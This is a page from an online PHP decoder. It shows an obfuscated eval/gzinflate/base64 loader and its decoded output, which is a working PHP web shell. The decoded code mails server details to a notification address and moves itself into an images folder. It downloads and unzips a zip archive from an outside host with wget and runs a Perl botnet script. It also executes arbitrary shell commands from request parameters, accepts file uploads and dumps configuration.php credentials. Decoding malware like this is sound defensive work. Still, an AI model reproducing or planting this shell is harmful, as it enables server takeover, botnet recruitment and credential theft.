Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if ( isset($_GET['index']) ) eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP5eqf..

Decoded Output download

if(!isset($_SESSION['bajak'])){
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Ada Maling!! http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
rename($source, $desti);
}
if(isset($_GET['kliverz'])){
system("wget http://enginesearch.net/image.zip;unzip image.zip");
}
if(isset($_GET['botnet'])){
system("cd image;perl bt.txt");
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>xSouL - BKHT</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :P "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$rf = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

Did this file decode correctly?

Original Code

<?php 
if ( isset($_GET['index']) )
eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP5eqf9usxfJjgoOvdNWFSGoHDgluk+4ONwXQNbGniQLttfyrgkB8d9iadfOC2JUq1ORcM/rM8+OdMInYYNYCcp6hoEfBP3B6YUzc9fsxrl3tR4+fnXeZclIJMpZkS7Z6aBxDnC81fbDf/3hBT0ejc7C404wokpNzbPrDfXQ/+fcD1Ph+bBiDcYiXqAFcjEjC5ZaCW1ApMhyplB4f6rNJJtAuhMDmn7lGQ+nCNLRwjAVMTgttOET4jaWhi3y0JQQlQVKCwwfHPT88HFj5HCATq9UO48fP0Ai4Q2rRjQyqaHIoehvxpmQd7zISwrusiLH/oYHVFRQcamqGWGUKDDIeEFQ/3Ew8tecRcYTl6plRCaevV6zGUZfp03hUiKlW4QasugWPUCuQUvCs3ajTnNX5bvtac0W8kkXZ5n1z1UAxS11KEgdlxlOdt+QLAoU13Wpwf7s3KtmXtH1zOLTJ8MTn7ho73zzVBdBlIgM6r6RoiwiS+8EJzgc9s9Tbq//3T89OPEd0w0xVcVWanJoNDg8P/FCVOFjMBg5Sh5685RaTrYlT+b4OxEi1hcFhZfPZd0sBUu2etItb6O2eRVCbt4kHPm5r4DKhUeQumeOB0ozC9mUdCCBFdHMy0BMBN49zztyhkqyfKav5BgLhX5CRVGxaOzgoSRxrDxop+oAv7Ddat/V7ru23dEomglP9xRKCezfBaL8QbbJX38fj/baSbY3LvY1yZXhUeAokPweur+TVSTYRL99MR803KfeMptU99rjpWYThW6JDdmlLvWwuBAFa3nKCN2WVFvvzWSODgi/5GTXUVcXa4sRlik8V6Yr5fSpZR3Wu/Lp3sKER2pbS5pBeHqGmZRMpLjIVT7HcVH3fzSP7TSItMi+Lc2yK0hE5E+6Tb/ltB3TIFPV0LoEMqN3en/WigJHTHFRWDw0rs/0blph3sRX/kWKy8sfyYHWryepEnbKHKSsVVaqhx0yfaanP26Ggy6l+2ITbSjSlHJkWuAez/JFEbXIoVgV4DtONMddGqUx3dQG5TjlK72NUMktWFfzfIP2eo153+l5IgU8IBMiLRPFZkkocLcdM8V35Gg5upr/KeE8QgSLVo8nYMp1eOt01cxrHFBJoZUW+4bBBP0rte5a/VWrnF95tDdEnMLca++SaBB48TWb1vvzn0ieDOb6hpIobkVpFdtjsCArHR2rJbe24A1t13Oec+zCsc71AiiNVMz1JspK70CjdmPUPhUcZ20wCrMw9IYILpyaEucK7YyR6cNH3E91o1AcdwP3UheV5qFow4WwUeOZNBWYXxJXSnjnVd0VuMAh1mbhkdgRWTb0ThlSICVEKPKehsPhtXtTdYc8Pl0slrCq6XiW8R0xlEjKNDZbtRp4bAHrHfRU3U475oPDTc4gVk+4g8jVkcxHs1rU1r5ncLR57vpnBU5HGEmKn4UgfghQMakhFBMEoA8rNJsFvWSzVVw0Xhu/+Dzh07Jg+iU3fxlNNUD0XP+rUH4CtZNVsp0w51Lg/wE=')))); ?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 2bfa820d4d6325b826fe5d1f1149885a
Eval Count 1
Decode Time 108 ms